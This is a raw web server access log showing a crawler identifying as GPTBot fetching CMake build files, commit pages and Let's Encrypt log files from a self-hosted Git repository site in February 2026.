"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13180] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10210] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32842] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 966] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 936] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11557] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10448] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13918] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:29:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:29:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14251] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11282] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11650] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12166] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11324] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11307] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10168] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11300] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10296] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12079] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10203] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 